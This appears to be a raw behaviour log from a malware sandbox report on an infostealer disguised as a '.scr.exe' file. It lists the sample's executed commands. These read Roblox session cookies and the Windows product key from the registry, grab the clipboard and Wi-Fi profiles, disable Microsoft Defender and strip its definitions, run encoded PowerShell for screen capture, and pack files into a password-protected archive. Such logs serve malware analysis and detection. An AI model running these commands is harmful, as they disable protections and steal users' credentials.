Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakac